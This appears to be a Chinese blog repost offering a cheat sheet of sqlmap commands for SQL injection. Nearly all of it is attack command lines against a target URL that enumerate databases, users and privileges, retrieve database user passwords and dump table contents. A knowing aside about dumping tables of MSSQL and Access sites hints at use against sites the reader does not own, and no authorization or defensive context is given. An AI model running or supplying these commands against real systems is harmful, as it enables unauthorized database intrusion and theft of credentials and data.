zoukankan      html  css  js  c++  java
  • sqlmap常用命令

    mssql access 直接爆表.然后你懂的

    sqlmap.py -u url --dbs //爆数据库
    sqlmap.py -u url --current-db //爆当前库
    sqlmap.py -u url --current-user //爆当前用户
    sqlmap.py -u url --users 查看用户权限
    sqlmap.py -u url --tables -D 数据库 //爆表段
    sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
    sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
    sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

    翻回来也可以

    sqlmap.py -u url 判断
    sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
    sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
    sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
    sqlmap.py -u url --privileges -v 0 这是判断当前的权限
    sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
    sqlmap.py -u url --tables -D '表' 爆表
    sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
    sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
    sqlmap.py -u url --dump -all -v 0

  • 相关阅读:
    linux命令备忘
    java搭建finagle(2)
    记一次Time-Wait导致的问题
    读loadBalance技术的一些笔记
    Immutable.js尝试(node.js勿入)
    python flask 部署
    一个奇怪的html上url参数问题
    xxx-servlet.xml vs applicationContext.xml
    大数据环境安装部署步骤
    数据迁移
  • 原文地址:https://www.cnblogs.com/hatkids/p/8973575.html
Copyright © 2011-2022 走看看